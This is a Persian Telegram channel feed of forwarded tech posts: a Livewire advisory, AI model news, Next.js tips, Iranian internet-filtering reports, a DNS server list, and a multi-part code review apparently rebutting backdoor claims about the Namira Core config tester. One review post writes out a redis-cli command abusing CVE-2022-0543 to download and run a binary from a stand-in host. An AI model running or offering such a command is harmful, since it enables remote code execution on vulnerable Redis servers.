Dev Perfects
40 subscribers
9.23K photos
1.26K videos
468 files
13K links
بخوام خیلی خلاصه بگم
این کانال میاد مطالب کانالای خفن تو حوزه تکنولوژی و برنامه نویسی رو جمع میکنه

پست پین رو بخونید
https://t.iss.one/dev_perfects/455


ارتباط:
https://t.iss.one/HidenChat_Bot?start=936082426
Download Telegram
دوره سیستم‌سازی با کمک هوش مصنوعی رسما شروع شد

اولین ویدئو آپلود شد:

https://youtu.be/qA39G0n0hcc

و هر چیزی که در ویدئو توضیح داده میشه در گیتهاب هم قرار می‌گیره که می‌تونید از اونجا برش دارید و متناسب با کیس‌های خودتون ازش استفاده کنید.

در قسمت اول، صرفا یه کاری کردیم هوش مصنوعی بهمون بگه چقدر بلندپروازیم. ولی در قسمت‌های بعدی، این موضوع رو بهتر و بهتر هم خواهیم کرد.

@haghiri75_blog
Forwarded from 🎄 یک برنامه نویس تنبل (Lazy 🌱)
🔶 باورم نمیشه که الان مردم با غلط املایی تایید میکند که من هوش مصنوعی نیستم

@TheRaymondDev
Forwarded from laravel-news
آسیب‌پذیری امنیتی Livewire v3 (GHSA-29cq-5w36-x7w3)
تاثیر و خطر:

در Livewire v3 (≤ 3.6.3) یک آسیب‌پذیری وجود دارد که به مهاجمان غیرمجاز اجازه اجرای دستورات از راه دور را می‌دهد.

احتیاج به احراز هویت ندارد - مهاجم بدون لاگین کردن می‌تواند حمله کند
نیاز به تعامل کاربر ندارد - خودکار قابل اجرا است
مختص Livewire v3 - نسخه‌های قبلی مشکل ندارند

علت مشکل:

مشکل از نحوه hydration یا بازسازی property های component ها نشأت می‌گیرد. یعنی وقتی Livewire می‌خواهد وضعیت component را به‌روزرسانی کند، در فرآیند بازسازی داده‌ها خطایی وجود دارد.
نسخه‌های آسیب‌پذیر:

Livewire v3.0.0-beta.1 تا v3.6.3

اطلاعات بیشتر
https://github.com/advisories/GHSA-29cq-5w36-x7w3?ref=securinglaravel.com


⚠️ لایووایر تون رو به نسخه ی `v3.6.4` ارتقا بدید. ⚠️


در این کامیت فیکس شده https://github.com/livewire/livewire/commit/ef04be759da41b14d2d129e670533180a44987dc
تیم groq با این پست از Artificial Analysis خبر از انتشار Kimi k2 روی پلتفرم خودش داد

با سرعت 40x؛ اگر مدل رو تست کرده باشید می‌دونید توی تسک‌های کد فوق‌العاده هست با اینکه thinking نیست.
اما مشکل اصلی کند بودنش بود که Groq اون رو حل کرده

۴۰ برابر سرعت بیشتر؛ روی پروژه جدیدم این مدل رو دقیق تست می‌کنم و با Gemini2.5 Pro مقایسه خواهم کرد.

نتایجش رو می‌ذارم حتماً (امیدوارم گراک نسخه بزرگش رو دپلوی کرده باشه)


توی تست mini دقیقاً میشه گفت near-realtime هست 😂😂🤯🤯🤯
Forwarded from linuxtnt(linux tips and tricks) (hosein seilany https://seilany.ir/)
🌐روسیه در آستانه ممنوع‌سازی واتس‌اپ به‌دلیل تهدیدات امنیتی

🔹 به گزارش وبینو، مجلس دومای روسیه طرحی را بررسی می‌کند که می‌تواند به ممنوعیت کامل واتس‌اپ در این کشور منجر شود.

🔸به‌گفته یکی از اعضای کمیته سیاست اطلاعاتی دومای روسیه، این پیام‌رسان تحت مالکیت متا، «تهدیدی برای امنیت ملی» است و باید خود را برای خروج از بازار روسیه آماده کند.

🔹 این اقدام در ادامه راهبرد کلان روسیه برای کاهش نفوذ پلتفرم‌های غربی و توسعه پیام‌رسان‌های بومی همچون «MAX» است.

🔸به‌موجب قانونی که اخیراً توسط پوتین امضا شده، استفاده از نرم‌افزارهای ساخت کشورهای «غیردوست» از اول سپتامبر ۲۰۲۵ با محدودیت‌هایی همراه خواهد شد.

🔹 تحلیلگران می‌گویند روسیه در مسیر «حاکمیت دیجیتال کامل» گام برمی‌دارد و احتمالاً واتس‌اپ نخستین پلتفرمی است که این سیاست بر روی آن اجرا خواهد شد.

🔸 چندی پیش نیز کنگره آمریکا استفاده از واتس‌اپ را به‌دلایل امنیتی ممنوع کرده بود.
اپلیکیشن Next.js خودتون رو به یک موشک تبدیل کنید!

اپلیکیشن Next.js شما گاهی کندتر از انتظارتون عمل می‌کنه؟ نگران نباشید، این مشکل خیلی از توسعه‌دهنده‌هاست. خبر خوب اینه که Next.js ابزارهای فوق‌العاده‌ای داره تا اپلیکیشن‌تون رو به یه موشک تبدیل کنه. فقط کافیه بدونید چطور ازشون استفاده کنید!

در دنیای دیجیتال امروز، هر میلی‌ثانیه حساب می‌شه. سرعت پایین یعنی تجربه کاربری ضعیف، سئوی بدتر و از دست دادن کاربر. بیاید با هم پرفورمنس Next.js رو یک بار برای همیشه بهینه کنیم.

این شما و این چند تکنیک کلیدی:

۱. جادوی Server و Client Components رو آزاد کنید

- سلاح مخفی شما: Server Components
روی سرور رندر می‌شن و هیچ JavaScript اضافی به کاربر نمی‌فرستن. برای محتوای استاتیک و لود سریع عالی‌ان!
- با دقت از Client Components استفاده کنید
فقط برای تعاملات کاربر لازمن. تا حد امکان کوچکشون کنید و پایین درخت کامپوننت‌ها بذاریدشون.
۲. با Caching هوشمند، سرعت رو به اوج برسونید
- از کشینگ داخلی Next.js استفاده کنید تا صفحات در چند میلی‌ثانیه لود بشن.
- با تنظیم تازگی کش، همیشه محتوای به‌روز داشته باشید.
۳. با Code Splitting، بار اولیه رو سبک کنید
- کامپوننت‌های سنگین رو فقط وقتی لود کنید که کاربر بهشون نیاز داره.
- اینطوری لود اولیه مثل برق می‌شه!

@DevTwitter | <Mahdi bagheri/>
Forwarded from Golang Insights (Javad)
🧬 فصل ششم ژنریک (Generics)

پس از سه ماه در کنار کارهایم بخش ششم ژنریک ها را کامل کردم این بخش یکی از جذاب ترین بخش ها بود که سعی کردم خیلی عمیق بپردازم و الان آماده اس برای مطالعه. امیدوارم این مطلب برایتان مفید واقع شود.

https://book.gofarsi.ir/chapter-6/

درصورتیکه کتاب را میخواهید از بصورت آفلاین استفاده کنید می توانید آخرین نسخه desktop را دانلود را با اجرای نسخه قبلی به نسخه جدید آپدیت نمایید.

https://github.com/GoFarsi/book/releases

در ضمن مشارکت در کتاب آزاد است و جای تجربیات شما خالی است اگر مایل بودین می توانید تجربیات خود را در کتاب به اشتراک بزارید.

https://github.com/GoFarsi/book/blob/main/COUNTRIBUTING.md


⚡️@GoInsights | @GolangEngineers
Forwarded from SoniaCircuit
OpenGFW
پروژه‌ای برای شبیه‌سازی فایروال چین (که توی ایران یه ورژن ضعیف تری ازش هم هست). می‌تونین روی روتر یا لینوکس‌تون اجرا کنین. و باهاش فیلترینگ دم‌دستی راه‌ بندازین.
—-

این پروژه رو تیم apernet توسعه داده که قبلا پروژه hysteria هم توسعه دادن

https://github.com/apernet

—-
دقت کنید که این یه شبیه سازی هستش و هنوز قابلیت هایی مثل Machine learning based traffic classification که در زیرساخت ازش استفاده میشه هنوز روی این پروژه پیاده سازی نشده.

#OpenGFW
#گزارش
کلودفلر زیر سایه‌ی تغییرات جدید فایروال فیلترینگ

بر اساس بررسی‌های ناکر (GFW-Knocker)، همه‌ی آیپی‌های عادی کلودفلر توی تغییرات جدید فایروال فیلترینگ وایت‌لیست شدن؛ یعنی فقط SNI سایت‌های معروف اجازه‌ی عبور دارن و بقیه‌ی سایت‌ها و دامنه‌های شخصی مسدود هستند؛ چه با فرگمنت، چه بدون فرگمنت. فیلتر باشند یا نباشند، اجازه عبور ندارند.

در پورت ۴۴۳، سایت‌های غیرمعروف کلاً بسته‌شدن و حتی دامنه‌ی شخصی‌ فیلترنشده هم مسدوده. تازه اگه یه سایت معروف رو هم با روش فرگمنت بفرستی، چون فایروال نمی‌تونه اسم دامنه رو درست ببینه، اونم مسدود میشه. خلاصه اینکه تا فایروال مطمئن نشه که دامنه، تو لیست مجازه، اتصال رو ادامه نمیده، حتی اگر مرورگر عادی و یک سایت عادی باشه.

در پورت ۸۰، پروتکل ws کامل بسته شده. اگر توی پکت کلمه‌ی websocket باشه، اونم فیلتر میشه. اگه دیتارو هم تکه‌تکه بفرستی، از پکت هفتم به بعد دیگه عبور نمی‌کنه.

خب، حالا باید چی کار کرد؟ جواب اصلی واضحه؛ آزادی ایران. ولی تا وقتی اون اتفاق نیفته، راه دیگه استفاده از انواع روش‌ها با رمزناشناختگیه؛ یعنی trickهایی که اگر عمومی مطرح بشن توسط فیلترچی مسدود میشن.

برای پورت ۸۰ کلودفلر، کانفیگ xhttp packet-up بدون TLS با دامنه‌ای که هنوز فیلتر نشده و fakeHost هم توی هسته مهسا روشن باشه، جواب میده. البته احتمال فیلترشدن دامنه وجود داره. و خبر خوب اینه که به‌زودی هسته‌ی مهسا آپدیت می‌شه تا این مدل کانفیگ با دامنه‌ی فیلترشده روی همه‌ی آیپی‌های کلودفلر کار کنه.

برای پورت ۴۴۳ کلودفلر، چون رنج‌های کلودفلر وایت‌لیست شدن، تقریبا تفاوتی با قطع ندارن و کار خاصی نمیشه کرد. البته یه‌سری گزینه هست مثل استفاده از اسکنرها، متد ECH، دستکاری ClientHello یا درخواست از مدیران کلودفلر برای فعال کردن Domain Fronting، ولی احتمال موفقیت کمه.

🔍 ircf.space
@ircfspace
دارم یک مطلب می‌نویسم برای نصب سریع یک دبیان مینیمال روی Qemu.

به محض اینکه آماده بشه لینکش رو اینجا قرار میدم.

@SohrabContents
Forwarded from lou's bs
من واقعاً فکر نمیکنم نیاز باشه تمام سورس کد رو بشکافم براتون تا همینجا فکر کنم پرونده این داستان بسته شده که نامیرا چیه و هیچ ربطی به سرور هایی که شما ترافیک نازنین گرامی خود رو بهشون می‌فرستید نداره :)
Forwarded from lou's bs
خب به این فانکشن جنجالی بپردازیم اول خودش رو براتون باز میکنم بعد کاملا با security based perspective  میام بررسیش میکنیم و بعدش پرونده حاشیه های پشت نامیرا رو میبندیم امیدوارم یک بار برای همیشه!

handleScan()
کارش چیه ؟
یه فلوی ساده داره واقعا
میاد اول کانفیگ هارو میخونه حالا چه multipart باشن جه json که ما میگیم به این کار content negotiation
تو مرحله بعدی داریم از قدرت ردیس استفاده میکنیم برای Deduplication
سپس جاب ها ساخته میشن و سابمیت میکنیم به worker pool
خب ساده بود نه؟ درسته منطق اصلی واقعا پیچیده تر از اینه ولی اره تو نگاه ابسترکت واقعا ساده است
تنها مشکلی هم که ممکنه باشه در اصل مشکل نیست چون تو لاجیک های دیگه ای که داریم ما این بحث رو هندل کردیم که آقا به اندازه منابع سیستم بیایم از ریسورس استفاده کنیم !

حالا آقا آیا عملا backdoor ممکنه تو این کد؟ رسما خیر چرا ممکنه نیست ؟ چون آسیب پذیری هایی که منجر به lua sandbox escape میشن عملا حداقل شناخته هاشون پچ شدن !
چه آسیب پذیری هایی ؟
CVE-2022-0543
CVE-2024-31449

نتیجتا backdoor بی backdoor !!!
نکته بعدی آقا به پیر به پیغمبر باید یه جایی باشه که به c2 وصل شه یه آدرسی باید موجود باشه که وقتی شما میای اینو سلف هاست میکنی ترافیک به اون آدرس بره و بیاد
من حتی لازم نبود تمام اینارو توضیح بدم این خیلی ساده قابل تشخیص بود
و نکته بعدی این دو آسیب پذیری رسما به این نیاز دارن ما بیایم از lua توی گو استفاده کنیم :)
به قاعده اگه این بود توی سورس مشخص میشد.

حتی اگه یه روز حال داشتم یه سورس آسیب پذیر نوشتم اینو به چشم ببینید :)

نکات بدی من با تیم نامیرا صحبت میکنم که حتی یه سری hardening هایی که نیاز هم بهشون نیست مثل بهره بری از ACL configuration
که بیان least privilege رو علنی دیگه نشون بدن
اجبار برای پسورد قوی
خاموش کردن کامند هایی مثل SLAVEOF
روشن کردن redis protected mode
خیال همه رو راحت تر کنن
هرچند واقعاً نیازی نیست اما امان از تخم شک :)

همچین کسی که داره هر پروژه رو سلف هاست میکنه باید بدونه چجوری سیستمشو harden کنه :)

اگه بخوام هم با خود redis cli بهتون یه نمونه روی CVE-2022-0543
نشون بدم

redis-cli --eval 'os.execute("curl -O https://my-bad-site.ir/redigo; chmod +x redigo; redigo")'


چیکار میکنه این کد؟ از آسیب پذیری ردیس استفاده میشه واسه RCE :)
Forwarded from lou's bs
یه نکته کلی رو هم راجع بحث api پروژه بگم
آقا این api core هستش یعنی قرار توسط خود شما (هرکی میخواد سلف هاست کنه ) استفاده شه در نتیجه دوستان و یاران عزیزم input sanitization دستی داخلش انجام نشده یه سری چک انجام شده فقط توسط خود xray که من نخوندم سورس کتابخونه رو!
Forwarded from lou's bs
قبل از این که به این بحث ادامه بدم یه نکته ای رو خواستم مجددا یاد آوری کنم
نامیرا هیچ سرور وی پی ان و پراکسی ای نساخته و اصلا کارش این نیست!
نامیرا ترافیک شما رو نمیبینه
نامیرا اصلا دسترسی به سرور هایی که توی output خودش ارائه میده نداره عزیزانم‌.
نامیرا نه سرور وی پی ان هست و نه خواهد بود تا جایی که من اطلاع دارم!

پس کارش چیه ؟
کانفیگ هایی که دیگران می‌سازند و پابلیک میکنن رو تست میکنه که آیا وصل هستن یا نه !
این کارو ولی به نحو احسن انجام میده!

چرا دارم اینو میگم؟ این که آیا استفاده از کانفیگ های پراکسی به شکل کلی امن هست یا نه کاملا یه بحث دیگس و ابدا رو دوش نامیرا نیست !‌
Forwarded from lou's bs
در ادامه یه فانکشن رو تو همین فایل بررسی میکنم که سرش بحث بود فانکشن handleScan
Forwarded from lou's bs
تو ادامه فایل handler.go دوتا فانکشن هم داریم که تازه به کد اضافه شدن و خشنودم که الان دارم بررسی میکنم این پروژه رو

startBackgroundRefresh()
performBackgroundRefresh()

خب به ترتیب اینارو هم بشکافیم با هم اگه موافق اید (مگه میشه نباشید؟)
اولا بگم جفت اینا نوشته شدن تا بیان یه بررسی کانفیگوریشن انجام بدن به شکل منظم و مداوم و بتونیم به سادگی کش ردیس رو فلاش کنیم

ورک فلو رو هم بخوام ساده بگم استارتر میاد یه ticker میسازه و یه گو روتین ساخته میشه شروع میکنه به گوش کردن به چنل ها
h.refreshTicker.C
h.refreshDone

و بسته به این که کدوم کیس رو داریم میاد background refresh میده و یا استاپ میکنه
لاجیک پرفورم هم که مشخصه !

درسته این روش مشکلات خودشو داره مثل این که هیچ راهی تعریف نشده تا بیایم یه refresh Synchronization داشته باشیم جهت چی ؟ حهت این که اطمینان داشه باشیم رفرش کامل شده قبل ذخیره نتایج
ولی آقا این نهایت یه باگ بی خطره نه بک دور !
به سادگی هم قابل حله.
یه نکته ای هم که من شخصا باهاش مشکل دارم اینه که این روش تمام سرویس api رو بلاک میکنه تا رفرش انجام بشه !
یه نکته خیلی ظریف ام که فقط پیشنهاده اینه که به جای پروسس کردن تمام کانفیگ تو یه سینگل جاب اونارو چانک چانک کنیم :)
یه سیستم atomic کنار staged refreshing , locked time out ,dry run mechanism هم خیلی خوب میتونست جمع کنه کارو ولی یادمون باشه این پروژه تحت فشار نوشته شده!

اینم کد این دوتا فانکشنه:
https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L75C1-L146C2
Forwarded from lou's bs
نکته:
هر نکته ای که اینجا بگم به بچه های تیم نامیرا هم اطلاع میدم.

همینجوری که گفتیم میایم اول پکیج api نامیرا رو بررسی میکنیم.
این پکیج سه تا فایل داره 
handler.go 
router.go
types.go


اول بگم بهتون این سه تا فایل و کلا این پکیج دارن چیکار میکنن 
تیم نامیرا اومده یه Restful api رو پیاده کرد و endpoint هایی رو ساخته به جهت کنترل جاب ها و یه لاجیک worker pool هم جداگانه نوشته شده برای پردازش موازی.
این بچه ها اومدن از redis استفاده کردن به جهت چی؟ دوتا اصطلاح مهم داریم واسه کاری که باهاش میکنن 
deduplication
results caching
میتونید اینارو سرچ کنید ولی self-explanatory
هستن واقعاً 
یه بخش ما لاجیک داریم برای GitHub integration که میتونیم با استفاده ازش نتایج رو ذخیره کنیم تو گیت هاب 
و یه health monitoring logic هم پیاده شده برای endpoint ها 


بعد بیایم handler.go اصلی رو بررسی کنیم

تو بخش ایمپورت ها اگه توجه کنید میبیند از ورژن 9 گو ردیس استفاده شده که هیچ یک از آسیب پذیری های که دارن باهاش نامیرا رو متهم میکنن داخلش نیست
من اون آسیب پذیری ها رو هم کاملا براتون باز میکنم و حتی بهتون نشون میدم چجوری هیچ بک دوری در کار نبوده و نیست :)
https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L17C2-L17C32

اولین بحش های لاجیکال فایل به تعاریف constant ها و type ها میرسیم
یه constant برای ذخیره سازی TTL ردیس
یه استراکت برای نگه داری نتایج تسک ها
دوتا فانکشن تایپ داریم که بیاد از نتایج پروسس رو تایپ بده بهشون
و یکی دیگه ام برای کانفیگ هایی که مثبت بودن بعد از چک
اینجا کد رو ببینید:
https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L23C1-L30C49


بعد توی کد میرسیم به استراکچر اصلی برای هندلر

خب کارش چیه مشخصه واقعا ما ازش استفاده میکنیم تا تمام لاجیک رو به شکل مرکزی داشته باشیم چه لاجیکی ؟ منطق های core , worker pool , redis , jobs ,github ...

https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L32C1-L48C2

در ادامه فانکشن NewHandler() رو داریم که میاد به عنوان initializer عمل میکنه و استارت میزنه به پول ورکر
تو این فانکشن آسیب پذیری ای وجود نداره ولی نکته ای هست اونم اینه که بیایم یه recovery mechanism پیاده کنیم واسه شرایط خاص که ممکنه job failure داشته باشیم البته من هنوز روی لاجیک های package worker عمیق نشدم و نخوندمشون اینو صد در صدشو بعد از خوندن اونا میگم.
https://github.com/NaMiraNet/namira-core/blob/8fdcb828411d232749dd760daccd721e590204e5/internal/api/handler.go#L50C1-L73C2
Forwarded from lou's bs
خب تو یه لایه abstract بیاید بررسی کنیم هسته نامریا به چه شکل کار میکنه ؟

دوستان به شکل کلی تمام کاری که پروژه داره انجام میده اینه که validation انجام بده روی کانفیگ هایی که بهش داده میشه
همین.
رسماً همین!

کانفیگ ها از کجا میان؟ از هرجا که ما بخوایم و میتونیم اونارو یا با api اضافه کنیم یا با کامند لاین اینترفیس. یعنی دست ما بازه.


این validation یا همون اعتبار سنجی ای که دارم میگم یعنی چی؟ یعنی میاد چند تا نکته رو راجع به کانفیگ بررسی میکنه
نکته اول میاد لینک هارو پارس میکنه و چکشون میکنه
این که چطور این کار هارو داره انجام میده رو وقتی میخوام بخش به بخش پکیج هارو توضیح بدم بهتون میگم
تو بخش پارس کردن ما تشخیص میدیم با چه کانفیگ ای طرف ایم دقیق بگم چه پروتوکل ای پشت کانفیگه.
و بخش دوم ما میایم یه هندشیک انجام میدیم که بفهمیم آقا این کانفیگ وصل هست یا نه که بیشتر این کار توسط کد های خود xray انجام میشه.

تو مرحله بعد یه sorting ساده انجام میشه و metadata رو هم نگه میداریم.

حالا چه بلایی سر خروجی میاد؟
آقا خروجی شما هر بلایی دلتون بخواد میتونید سرش بیارید. بدید به api بفرستید تو ریپو خودتون و یا کش کنیدشون دستتون کاملا بازه.

حالا قبل این که بیام بخش به بخش پروژه رو براتون باز کنم بیاید یه نیم نگاهیی باز هم abstract بندازیم به موضوع امنیت
چطور ممکنه داخل پروژه ای که شما دارید سلف هاست میکنید بک دوری وجود داشته باشه؟

واسه این موضوع اول بیاید یه نگاه کوچیک به بک دور داشته باشیم که چی هست و چگونه کار میکنه!
بک دور چیه؟
ساده بیان کنم یه روش واسه این که بیایم سیستم های authentication و encryption یا security controls رو داخل هر بخشی شامل os , hardware, network, software و غیره دور بزنیم و بتونیم به سیستم بدون هیچ خون و خون ریزی ای دسترسی داشته باشی و نرمالی بدون هیچ privilege خاصی هر کاری دلمون خواست بکنیم.

خیلی ساده بیان کنم بک دور کارش اینه بیاید بیاید یه دسترسی به adversary بده که نرمالی این کار توسط یه سیستم command and control یا همون c2 انجام میشه که چی؟ که بشه به شکل غیر مستقیم دستورات لازم رو داد به سیستم.

این یعنی چی؟ یعنی به ساده ترین بیان ممکنه یه ترافیک ای حالا یا بایند شده به پروسس های معتبر یا تو سطح کمتر حرفه به شکل مجزا از سیستم به بیرون میره و بر میگرده!

به شکل کلی backdoor ها یه معماری مشخص دارن و life cycle مشخص تر
یعنی چی ؟
یعنی یه دسترسی ایجاد میشه حالا توسط آسیب پذیری هایی که شناخته شدن یا مهندسی اجتماعی و مالور ها که ما اینجا با اولی کار داریم.
سپس موضوع persistency میاد وسط که نرمالی باید یه روت کیت یا تغییر firmware یا payload های رمزنگاری شده و...( این رو باز نمیکنم کامل) بیاد وسط که بک دور ما بتونه تو پروسه ریبوت ها زنده بمونه.

اینجا تازه نیاز پیدا میشه سیستم ای که تارگت بوده توسط کد مخرب ما (یا دستی) بیاید یه tunnel یا هر نوع channel به شکل encrypted بین سیستم قربانی و سیستم C2 برقرار کنه که اصلا هم نمخوام بحث های پیوتینگ و اینارو باز کنم الان...

در نهایت دیگه اجرای هر کامندی برای هر هدف ای ممکن میشه!

خب حالا ما میدونیم بک دور چیه انواع داره؟ بله داره چندتاشو حال دارم بگم!
malware based ( torjans, ...)

hardware based ( embedded in freaking physical components)

cryptographic backdoors
این داداشمون خیلی تمیز کار میکنه ولی خب سخته خیلی سخته نرمالی دولت ها ازش استفاده میکنن ! چرا چون باید به شکل تعمدی توی ساختار اصلی یه encryption algorithm بیان یه آسیب پذیری بزارن. یا تو مواردی آسیب پذیری های شناخته شده هم به این درد میخوردن ولی خب خیلی زود اونا پچ شدن و بای بای گفتم یه مثال جالب بزنن از این
Dual_EC_DRGB algorithm
بود که میگفتن بکدوری که داره واسه NSA بود خدا میداند ولی خواستید راجع بهش تحقیق کنید جالبه

Firmware backdoors

Rootkits

Web application backdoors

supply chain backdoors

Intentional/developer backdoors

خب بگذریم از انواع این داستان
نامیرا متهم شده به ساخت بکدور و هدف اینه این سابجت رو کاملاً بررسی کنیم.
Forwarded from SoniaCircuit (Sonia Fatholahi)
🚀 نسخه پایدار Namira Core v1.0.0 منتشر شد! 🚀

یک ابزار حرفه‌ای و اوپن‌سورس برای تست و ارزیابی کیفیت واقعی کانفیگ‌های شما! با Namira Core می‌تونید به صورت خودکار بهترین کانفیگ‌ها رو پیدا کرده و از اتصال پایدار لذت ببرید.
〰️〰️〰️〰️〰️〰️〰️〰️〰️〰️
مهم‌ترین ویژگی‌ها:
تست واقعی و دقیق: کانفیگ‌ها با اتصال کامل TCP تست میشن، نه فقط یک پینگ ساده!
📡 پشتیبانی از پروتکل‌های محبوب: سازگاری کامل با VMess، VLESS، Trojan و Shadowsocks.
📢 اتصال به تلگرام: کانفیگ‌های سالم و سریع به صورت خودکار برای کانال یا گروه شما ارسال میشه.
💾 ادغام با گیت‌هاب: نتایج و کانفیگ‌های معتبر رو مستقیم در ریپازیتوری گیت‌هاب خودتون ذخیره کنید.
⚙️ معماری بهینه: با استفاده از Worker Pool و Redis، تعداد زیادی کانفیگ رو با سرعت بالا و بدون فشار به سرور پردازش می‌کنه.
🐳 پشتیبانی کامل از Docker: راه‌اندازی فوق‌العاده سریع و آسان با Docker Compose.
〰️〰️〰️〰️〰️〰️〰️〰️〰️〰️
این نسخه نتیجه بیش از ۶۰ بهبود، شامل ویژگی‌های جدید، رفع باگ و بهینه‌سازی‌های عملکردی است.
📥 دریافت آخرین نسخه از گیت‌هاب
⭐️ مشاهده پروژه در گیت‌هاب


📌 @NamiraNet
Forwarded from SoniaCircuit (Sonia Fatholahi)
لیست دی ان اس هایی که شاید به دردتون بخوره.

1 رادار
10.202.10.10
10.202.10.11
2 سرویس 403
10.202.10.202
10.202.10.102
3 بگذر
185.55.226.26
185.55.225.25
4 شکن
178.22.122.100
185.51.200.2
5 کاربران شاتل
85.15.1.14
85.15.1.15
6 الکترو
78.157.42.100
78.157.42.101
7 هاستیران
172.29.2.100
172.29.2.100

8 Server ir
194.104.158.48
194.104.158.78

9 Level3
209.244.0.3
209.244.0.4

10 Open DNS
208.67.222.222
208.67.220.220

11 Gmaing DNS 1
78.157.42.100
185.43.135.1

12 Gmaing DNS 2
156.154.70.1
156.154.71.1

13 Gmaing DNS 3
149.112.112.112
149.112.112.10

14 Gmaing DNS 4
185.108.22.133
185.108.22.134

15 Gmaing DNS 5
85.214.41.206
89.15.250.41

16 Gmaing DNS 6
9.9.9.9
109.69.8.51

17 Gmaing DNS 7
8.26.56.26
8.26.247.20

18 Gmaing DNS 8
185.121.177.177
169.239.202.202

19 Gmaing DNS 9
185.231.182.126
185.43.135.1

20 Gmaing DNS 10
185.43.135.1
46.16.216.25

21 Gmaing DNS 11
185.213.182.126
185.43.135.1

22 Gmaing DNS 12
199.85.127.10
185.231.182.126

23 Gmaing DNS 13
91.239.100.100
37.152.182.112

24 Gmaing DNS 14
8.26.56.26
8.20.247.20

25 Gmaing DNS 15
78.157.42.100
1.1.1.1

26 Gmaing DNS 16
87.135.66.81
76.76.10.4
27 مخابرات،شاتل،اسیاتک،رایتل
91.239.100.100
89.233.43.71
28 پارس آنلاین

46.224.1.221
46.224.1.220
29 همراه اول
208.67.220.200
208.67.222.222
30 ایرانسل
109.69.8.51
0.0.0.0
31 ایرانسل
74.82.42.42
0.0.0.0
32 مخابرات
8.8.8.8
8.8.4.4
33 مخابرات
4.4.4.4
4.2.2.4
34 مخابرات
195.46.39.39
195.46.39.40
35 مبین نت
10.44.8.8
8.8.8.8
36 سایر اپراتورها
199.85.127.10
199.85.126.10
37 سوئیس
176.10.118.132
176.10.118.133
38 کویت
94.187.170.2
94.187.170.3
39 اسپانیا
195.235.194.7
195.235.194.8
40 تاجیکستان
45.81.37.0
45.81.37.1